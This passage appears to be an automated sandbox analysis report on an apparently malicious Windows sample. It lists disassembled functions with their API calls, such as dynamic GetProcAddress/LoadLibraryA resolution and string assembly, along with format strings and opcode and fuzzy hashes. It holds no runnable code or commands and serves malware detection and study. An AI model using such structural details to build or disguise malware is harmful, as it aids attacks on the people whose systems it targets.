                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                          Function 00412070 Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                          Function 008914A7 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5723d8a4f13e80fdb60319108e426ce59ece776137d3dc195fcc8599d7aeed79
                                          • Instruction ID: c2e7c66bab7a1ac99f47eb2f94d62a15f672868f51dd82da93d8d03ab113a96e
                                          • Opcode Fuzzy Hash: 5723d8a4f13e80fdb60319108e426ce59ece776137d3dc195fcc8599d7aeed79
                                          • Instruction Fuzzy Hash: F0B012310557CC8AC10252495410A6077EC9304C11F000091E44843913C108F910C490
                                          Function 00401240 Relevance: .0, Instructions: 6COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5723d8a4f13e80fdb60319108e426ce59ece776137d3dc195fcc8599d7aeed79
                                          • Instruction ID: c2e7c66bab7a1ac99f47eb2f94d62a15f672868f51dd82da93d8d03ab113a96e
                                          • Opcode Fuzzy Hash: 5723d8a4f13e80fdb60319108e426ce59ece776137d3dc195fcc8599d7aeed79
                                          • Instruction Fuzzy Hash: F0B012310557CC8AC10252495410A6077EC9304C11F000091E44843913C108F910C490
                                          Function 008A23E7 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcAddress.KERNEL32(006187D8,00618168), ref: 008A2428
                                          • GetProcAddress.KERNEL32(006187D8,0061850C), ref: 008A2441
                                          • GetProcAddress.KERNEL32(006187D8,00618578), ref: 008A2459
                                          • GetProcAddress.KERNEL32(006187D8,006181C8), ref: 008A2471
                                          • GetProcAddress.KERNEL32(006187D8,006181B4), ref: 008A248A
                                          • GetProcAddress.KERNEL32(006187D8,00618254), ref: 008A24A2
                                          • GetProcAddress.KERNEL32(006187D8,00618420), ref: 008A24BA
                                          • GetProcAddress.KERNEL32(006187D8,00618298), ref: 008A24D3
                                          • GetProcAddress.KERNEL32(006187D8,006184EC), ref: 008A24EB
                                          • GetProcAddress.KERNEL32(006187D8,00618490), ref: 008A2503
                                          • GetProcAddress.KERNEL32(006187D8,00618314), ref: 008A251C
                                          • GetProcAddress.KERNEL32(006187D8,00618248), ref: 008A2534
                                          • GetProcAddress.KERNEL32(006187D8,00618540), ref: 008A254C
                                          • GetProcAddress.KERNEL32(006187D8,00618018), ref: 008A2565
                                          • GetProcAddress.KERNEL32(006187D8,006184E4), ref: 008A257D
                                          • GetProcAddress.KERNEL32(006187D8,00618188), ref: 008A2595
                                          • GetProcAddress.KERNEL32(006187D8,00618370), ref: 008A25AE
                                          • GetProcAddress.KERNEL32(006187D8,00618568), ref: 008A25C6
                                          • GetProcAddress.KERNEL32(006187D8,00618024), ref: 008A25DE
                                          • GetProcAddress.KERNEL32(006187D8,00618090), ref: 008A25F7
                                          • GetProcAddress.KERNEL32(006187D8,00618214), ref: 008A260F
                                          • LoadLibraryA.KERNEL32(00618498,?,008A06A7), ref: 008A2621
                                          • LoadLibraryA.KERNEL32(006180E0,?,008A06A7), ref: 008A2632
                                          • LoadLibraryA.KERNEL32(00618068,?,008A06A7), ref: 008A2644
                                          • LoadLibraryA.KERNEL32(00618140,?,008A06A7), ref: 008A2656
                                          • LoadLibraryA.KERNEL32(00618284,?,008A06A7), ref: 008A2667
                                          • GetProcAddress.KERNEL32(006185FC,006183FC), ref: 008A2689
                                          • GetProcAddress.KERNEL32(0061871C,0061837C), ref: 008A26AA
                                          • GetProcAddress.KERNEL32(0061871C,00618130), ref: 008A26C2
                                          • GetProcAddress.KERNEL32(0061880C,006182F0), ref: 008A26E4
                                          • GetProcAddress.KERNEL32(006186D0,0061808C), ref: 008A2705
                                          • GetProcAddress.KERNEL32(00618700,0061836C), ref: 008A2726
                                          • GetProcAddress.KERNEL32(00618700,00414194), ref: 008A273D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID:
                                          • API String ID: 2238633743-0
                                          • Opcode ID: a6446af475f856057040de3f9c45a65888bee7be2fd0af68c1fc8b12d5e42eef
                                          • Instruction ID: 42f45a1398c14f4645ea26e2791acfaaecd85e9625a6333a9e78b724be7ac601
                                          • Opcode Fuzzy Hash: a6446af475f856057040de3f9c45a65888bee7be2fd0af68c1fc8b12d5e42eef
                                          • Instruction Fuzzy Hash: 3EA11AB55102409FC394DFA9EC88ADA77EBF78D701768E61BEA09C36A0DF359841CB50
                                          Function 00896F77 Relevance: 29.0, APIs: 19, Instructions: 494stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 008A3337: lstrlen.KERNEL32(0089427C,?,?,0089427C,00414716), ref: 008A3342
                                            • Part of subcall function 008A3337: lstrcpy.KERNEL32(00414716,00000000), ref: 008A339C
                                            • Part of subcall function 008A34C7: lstrlen.KERNEL32(00000000,?,00000000,?,00000000,00414736,00414735), ref: 008A34DC
                                            • Part of subcall function 008A34C7: lstrcpy.KERNEL32(00000000), ref: 008A351B
                                            • Part of subcall function 008A34C7: lstrcat.KERNEL32(00000000,00000000), ref: 008A3529
                                            • Part of subcall function 008A33B7: lstrcpy.KERNEL32(?,00000000), ref: 008A341C
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008972A9
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 008972B0
                                          • lstrcat.KERNEL32(?,00000000), ref: 008973F1
                                          • lstrcat.KERNEL32(?,00414A08), ref: 00897400
                                          • lstrcat.KERNEL32(?,00000000), ref: 00897413
                                          • lstrcat.KERNEL32(?,00414A0C), ref: 00897422
                                          • lstrcat.KERNEL32(?,00000000), ref: 00897435
                                          • lstrcat.KERNEL32(?,00414A10), ref: 00897444
                                          • lstrcat.KERNEL32(?,00000000), ref: 00897457
                                          • lstrcat.KERNEL32(?,00414A14), ref: 00897466
                                          • lstrcat.KERNEL32(?,00000000), ref: 00897479
                                          • lstrcat.KERNEL32(?,00414A18), ref: 00897488
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089749B
                                          • lstrcat.KERNEL32(?,00414A1C), ref: 008974AA
                                            • Part of subcall function 00896767: memcmp.MSVCRT ref: 00896782
                                            • Part of subcall function 00896767: memset.MSVCRT ref: 008967B5
                                          • lstrcat.KERNEL32(?,00000000), ref: 008974F3
                                          • lstrcat.KERNEL32(?,00414A20), ref: 0089750D
                                          • lstrlen.KERNEL32(?), ref: 0089754C
                                          • lstrlen.KERNEL32(?), ref: 0089755B
                                          • memset.MSVCRT ref: 008975A4
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpylstrlen$Heapmemset$AllocateProcessmemcmp
                                          • String ID:
                                          • API String ID: 673082036-0
                                          • Opcode ID: 35d02b99f65f5b9c903c2c26e54eec1326a7691fa909ee767015df0a37c7766a
                                          • Instruction ID: 261f13cefb2f31e5a4d0979a0ae8bbc20396e0d4f21c59a3561403ff077fcf5c
                                          • Opcode Fuzzy Hash: 35d02b99f65f5b9c903c2c26e54eec1326a7691fa909ee767015df0a37c7766a
                                          • Instruction Fuzzy Hash: FE022971910108ABDF05EBA8DD96EFE7339FF65301F144159F106A35A1EE34AB48CB62
                                          Function 00406D10 Relevance: 29.0, APIs: 19, Instructions: 494stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 004130D0: lstrlen.KERNEL32(00000000,?,?,0040F9D0,00414677,00414676,?,?,00410567,00000000,?,008859C8,?,00414834,?,00000000), ref: 004130DB
                                            • Part of subcall function 004130D0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413135
                                            • Part of subcall function 00413260: lstrlen.KERNEL32(?,00414838,?,00000000,00414682), ref: 00413275
                                            • Part of subcall function 00413260: lstrcpy.KERNEL32(00000000), ref: 004132B4
                                            • Part of subcall function 00413260: lstrcat.KERNEL32(00000000,00000000), ref: 004132C2
                                            • Part of subcall function 00413150: lstrcpy.KERNEL32(?,00414682), ref: 004131B5
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00407042
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00407049
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040718A
                                          • lstrcat.KERNEL32(?,00414A08), ref: 00407199
                                          • lstrcat.KERNEL32(?,00000000), ref: 004071AC
                                          • lstrcat.KERNEL32(?,00414A0C), ref: 004071BB
                                          • lstrcat.KERNEL32(?,00000000), ref: 004071CE
                                          • lstrcat.KERNEL32(?,00414A10), ref: 004071DD
                                          • lstrcat.KERNEL32(?,00000000), ref: 004071F0
                                          • lstrcat.KERNEL32(?,00414A14), ref: 004071FF
                                          • lstrcat.KERNEL32(?,00000000), ref: 00407212
                                          • lstrcat.KERNEL32(?,00414A18), ref: 00407221
                                          • lstrcat.KERNEL32(?,00000000), ref: 00407234
                                          • lstrcat.KERNEL32(?,00414A1C), ref: 00407243
                                            • Part of subcall function 00406500: memcmp.MSVCRT ref: 0040651B
                                            • Part of subcall function 00406500: memset.MSVCRT ref: 0040654E
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040728C
                                          • lstrcat.KERNEL32(?,00414A20), ref: 004072A6
                                          • lstrlen.KERNEL32(?), ref: 004072E5
                                          • lstrlen.KERNEL32(?), ref: 004072F4
                                          • memset.MSVCRT ref: 0040733D
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpylstrlen$Heapmemset$AllocateProcessmemcmp
                                          • String ID:
                                          • API String ID: 673082036-0
                                          • Opcode ID: d118afa1bda119b001ceff74a600667826f4035f7d95009499287c34a8604611
                                          • Instruction ID: 6691f588a9258b9fc81b87b5fa78a63e4fb191c346f6debf514e0fc625545640
                                          • Opcode Fuzzy Hash: d118afa1bda119b001ceff74a600667826f4035f7d95009499287c34a8604611
                                          • Instruction Fuzzy Hash: AC025F71910108ABCB04EFA1DC96EEE7779AF58306F10416EF506731A5DF386B88CB69
                                          Function 00898F57 Relevance: 28.9, APIs: 19, Instructions: 374stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                            • Part of subcall function 008A34C7: lstrlen.KERNEL32(00000000,?,00000000,?,00000000,00414736,00414735), ref: 008A34DC
                                            • Part of subcall function 008A34C7: lstrcpy.KERNEL32(00000000), ref: 008A351B
                                            • Part of subcall function 008A34C7: lstrcat.KERNEL32(00000000,00000000), ref: 008A3529
                                            • Part of subcall function 008A33B7: lstrcpy.KERNEL32(?,00000000), ref: 008A341C
                                            • Part of subcall function 008A1837: GetSystemTime.KERNEL32(?,00618208,00414191,?,?,00000000,?,00618154,?,00417A94,?,?,?,00417A98,00414759), ref: 008A185D
                                            • Part of subcall function 008A3437: lstrcpy.KERNEL32(00000000,?), ref: 008A3489
                                            • Part of subcall function 008A3437: lstrcat.KERNEL32(00000000), ref: 008A3499
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0089912E
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00899135
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089926F
                                          • lstrcat.KERNEL32(?,00414AB4), ref: 0089927E
                                          • lstrcat.KERNEL32(?,00000000), ref: 00899291
                                          • lstrcat.KERNEL32(?,00414AB8), ref: 008992A0
                                          • lstrcat.KERNEL32(?,00000000), ref: 008992B3
                                          • lstrcat.KERNEL32(?,00414ABC), ref: 008992C2
                                          • lstrcat.KERNEL32(?,00000000), ref: 008992D5
                                          • lstrcat.KERNEL32(?,00414AC0), ref: 008992E4
                                          • lstrcat.KERNEL32(?,00000000), ref: 008992F7
                                          • lstrcat.KERNEL32(?,00414AC4), ref: 00899306
                                          • lstrcat.KERNEL32(?,00000000), ref: 00899319
                                          • lstrcat.KERNEL32(?,00414AC8), ref: 00899328
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089933B
                                          • lstrcat.KERNEL32(?,00414ACC), ref: 0089934A
                                            • Part of subcall function 008A3337: lstrlen.KERNEL32(0089427C,?,?,0089427C,00414716), ref: 008A3342
                                            • Part of subcall function 008A3337: lstrcpy.KERNEL32(00414716,00000000), ref: 008A339C
                                          • lstrlen.KERNEL32(?), ref: 00899391
                                          • lstrlen.KERNEL32(?), ref: 008993A0
                                          • memset.MSVCRT ref: 008993E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlen$Heap$AllocateProcessSystemTimememset
                                          • String ID:
                                          • API String ID: 245975372-0
                                          • Opcode ID: 11ec1a2fe193cc1f3d8a417ba9b63f14695d7241628e5d7c4afcf79c9e2c0e96
                                          • Instruction ID: a60cb3a7eee8d6ebe5a0bd8aaa1d6a6a9fb2f953d582d3580e7d39aa075231f7
                                          • Opcode Fuzzy Hash: 11ec1a2fe193cc1f3d8a417ba9b63f14695d7241628e5d7c4afcf79c9e2c0e96
                                          • Instruction Fuzzy Hash: D1E12971940108AFDF05EBA8DC96EEE7379FF55301F148159F106A35A1EE34AB48CB62
                                          Function 00408CF0 Relevance: 28.9, APIs: 19, Instructions: 374stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                            • Part of subcall function 00413260: lstrlen.KERNEL32(?,00414838,?,00000000,00414682), ref: 00413275
                                            • Part of subcall function 00413260: lstrcpy.KERNEL32(00000000), ref: 004132B4
                                            • Part of subcall function 00413260: lstrcat.KERNEL32(00000000,00000000), ref: 004132C2
                                            • Part of subcall function 00413150: lstrcpy.KERNEL32(?,00414682), ref: 004131B5
                                            • Part of subcall function 004115D0: GetSystemTime.KERNEL32(?,00000000,00414191,?,?,?,?,?,?,?,?,?,00403A73,?,00000014), ref: 004115F6
                                            • Part of subcall function 004131D0: lstrcpy.KERNEL32(00000000,?), ref: 00413222
                                            • Part of subcall function 004131D0: lstrcat.KERNEL32(00000000), ref: 00413232
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00408EC7
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00408ECE
                                          • lstrcat.KERNEL32(?,00000000), ref: 00409008
                                          • lstrcat.KERNEL32(?,00414AB4), ref: 00409017
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040902A
                                          • lstrcat.KERNEL32(?,00414AB8), ref: 00409039
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040904C
                                          • lstrcat.KERNEL32(?,00414ABC), ref: 0040905B
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040906E
                                          • lstrcat.KERNEL32(?,00414AC0), ref: 0040907D
                                          • lstrcat.KERNEL32(?,00000000), ref: 00409090
                                          • lstrcat.KERNEL32(?,00414AC4), ref: 0040909F
                                          • lstrcat.KERNEL32(?,00000000), ref: 004090B2
                                          • lstrcat.KERNEL32(?,00414AC8), ref: 004090C1
                                          • lstrcat.KERNEL32(?,00000000), ref: 004090D4
                                          • lstrcat.KERNEL32(?,00414ACC), ref: 004090E3
                                            • Part of subcall function 004130D0: lstrlen.KERNEL32(00000000,?,?,0040F9D0,00414677,00414676,?,?,00410567,00000000,?,008859C8,?,00414834,?,00000000), ref: 004130DB
                                            • Part of subcall function 004130D0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413135
                                          • lstrlen.KERNEL32(?), ref: 0040912A
                                          • lstrlen.KERNEL32(?), ref: 00409139
                                          • memset.MSVCRT ref: 00409182
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlen$Heap$AllocateProcessSystemTimememset
                                          • String ID:
                                          • API String ID: 245975372-0
                                          • Opcode ID: 8224fe9bfe33752ef812c58f9a3c07454bd887e93f5e4e8b5787d87485b44b35
                                          • Instruction ID: ba2303238d793748fed188a988be053d5d0ac0d0c647531a17e04c80a5b47ec6
                                          • Opcode Fuzzy Hash: 8224fe9bfe33752ef812c58f9a3c07454bd887e93f5e4e8b5787d87485b44b35
                                          • Instruction Fuzzy Hash: 3AE15D71910108AFCB04EFA1DD96EEE7779AF58305F10415EF506A30A5DF386B88CB69
                                          Function 00404A70 Relevance: 26.7, APIs: 10, Strings: 5, Instructions: 493stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00413050: lstrcpy.KERNEL32(?,00000000), ref: 00413096
                                            • Part of subcall function 004038C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00403946
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                            • Part of subcall function 00413260: lstrlen.KERNEL32(?,00414838,?,00000000,00414682), ref: 00413275
                                            • Part of subcall function 00413260: lstrcpy.KERNEL32(00000000), ref: 004132B4
                                            • Part of subcall function 00413260: lstrcat.KERNEL32(00000000,00000000), ref: 004132C2
                                            • Part of subcall function 00413150: lstrcpy.KERNEL32(?,00414682), ref: 004131B5
                                            • Part of subcall function 004131D0: lstrcpy.KERNEL32(00000000,?), ref: 00413222
                                            • Part of subcall function 004131D0: lstrcat.KERNEL32(00000000), ref: 00413232
                                          • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,00000000,00000000,?,00000000,00000000,?,00414D94), ref: 00404F7E
                                          • lstrlen.KERNEL32(00000000), ref: 00404F8F
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00404FA0
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00404FA7
                                          • lstrlen.KERNEL32(00000000), ref: 00404FBC
                                          • memcpy.MSVCRT ref: 00404FD3
                                          • lstrlen.KERNEL32(00000000), ref: 00404FE5
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404FFE
                                          • memcpy.MSVCRT ref: 0040500B
                                          • lstrlen.KERNEL32(00000000,?,?), ref: 00405028
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$lstrcpy$Heaplstrcatmemcpy$AllocateProcess
                                          • String ID: "$"$------$------$------
                                          • API String ID: 1086105663-2180234286
                                          • Opcode ID: 26eec3760455270602d5bd66fec490e262ed912d703d5f9d989fe5dc8aa845c2
                                          • Instruction ID: b3acf589dced84f0a0bdb3bbece81a8fabf167722516a49aa3269f8227201ab4
                                          • Opcode Fuzzy Hash: 26eec3760455270602d5bd66fec490e262ed912d703d5f9d989fe5dc8aa845c2
                                          • Instruction Fuzzy Hash: B312FA76920118AACB15EFA1DC95FEEB378BF54705F00419EB10663195EF782B88CF68
                                          Function 0040B800 Relevance: 16.8, APIs: 11, Instructions: 298stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • strtok_s.MSVCRT ref: 0040B837
                                          • strtok_s.MSVCRT ref: 0040BC5F
                                            • Part of subcall function 004130D0: lstrlen.KERNEL32(00000000,?,?,0040F9D0,00414677,00414676,?,?,00410567,00000000,?,008859C8,?,00414834,?,00000000), ref: 004130DB
                                            • Part of subcall function 004130D0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413135
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strtok_s$lstrcpylstrlen
                                          • String ID:
                                          • API String ID: 348468850-0
                                          • Opcode ID: 7b2e34e678f2bd22796688cf0585c68a256fcf47a522aaee57e06a3a9882f49d
                                          • Instruction ID: 357e97b8220c04f1253e5ea3142bfa513dde73726e007ec1678d313707bb5995
                                          • Opcode Fuzzy Hash: 7b2e34e678f2bd22796688cf0585c68a256fcf47a522aaee57e06a3a9882f49d
                                          • Instruction Fuzzy Hash: 9CC1A5B59001089BCB14EF60DC89FDAB779AB58304F0485DEE50967151EF78ABC5CF98
                                          Function 0040D820 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 237stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat
                                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                          • API String ID: 4038537762-2524465048
                                          • Opcode ID: fc8f8692cfdbc3652edcd45e82f8c6a2cfae9c653859402aab069b0520a3686c
                                          • Instruction ID: 2ab86484d6f9dce3bb57da3c3004be3ba42ac5a63d99f8946a593feb9ea809c1
                                          • Opcode Fuzzy Hash: fc8f8692cfdbc3652edcd45e82f8c6a2cfae9c653859402aab069b0520a3686c
                                          • Instruction Fuzzy Hash: E19163B2A002089FCB24DFA4DC85FEE737DBB44704F08859AF61993195DB749A84CF95
                                          Function 00894CD7 Relevance: 15.5, APIs: 10, Instructions: 493stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 008A32B7: lstrcpy.KERNEL32(?,00000000), ref: 008A32FD
                                            • Part of subcall function 00893B27: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00893BAD
                                            • Part of subcall function 008A3257: lstrcpy.KERNEL32(5GA,00000000), ref: 008A329F
                                            • Part of subcall function 008A34C7: lstrlen.KERNEL32(00000000,?,00000000,?,00000000,00414736,00414735), ref: 008A34DC
                                            • Part of subcall function 008A34C7: lstrcpy.KERNEL32(00000000), ref: 008A351B
                                            • Part of subcall function 008A34C7: lstrcat.KERNEL32(00000000,00000000), ref: 008A3529
                                            • Part of subcall function 008A33B7: lstrcpy.KERNEL32(?,00000000), ref: 008A341C
                                            • Part of subcall function 008A3437: lstrcpy.KERNEL32(00000000,?), ref: 008A3489
                                            • Part of subcall function 008A3437: lstrcat.KERNEL32(00000000), ref: 008A3499
                                          • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,00414D98,00000000,?,00618054,00000000,?,0061824C,00000000,?,00414D94), ref: 008951E5
                                          • lstrlen.KERNEL32(00000000), ref: 008951F6
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00895207
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0089520E
                                          • lstrlen.KERNEL32(00000000), ref: 00895223
                                          • memcpy.MSVCRT ref: 0089523A
                                          • lstrlen.KERNEL32(00000000), ref: 0089524C
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00895265
                                          • memcpy.MSVCRT ref: 00895272
                                          • lstrlen.KERNEL32(00000000,?,?), ref: 0089528F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$lstrcpy$Heaplstrcatmemcpy$AllocateProcess
                                          • String ID:
                                          • API String ID: 1086105663-0
                                          • Opcode ID: ba30d7ea4f629b7e4abd9e4e21bca524f3400424943e8c30884d53483c844499
                                          • Instruction ID: 146cd8d3d1b831c1b56ed4db8ea6e5ad78f1770aeb9bf856c96ad7a7871c51bf
                                          • Opcode Fuzzy Hash: ba30d7ea4f629b7e4abd9e4e21bca524f3400424943e8c30884d53483c844499
                                          • Instruction Fuzzy Hash: E112F971810118ABDF16EBA8EC96FEEB378FF65700F144199B10AA3591EF306B48CB51
                                          Function 0089BB42 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcpy.KERNEL32(?,?), ref: 0089BB72
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BBAE
                                            • Part of subcall function 008A1F37: lstrlen.KERNEL32(?), ref: 008A1F7E
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BBF6
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BC3E
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BC85
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BCCD
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BD15
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BD5C
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0089BDA4
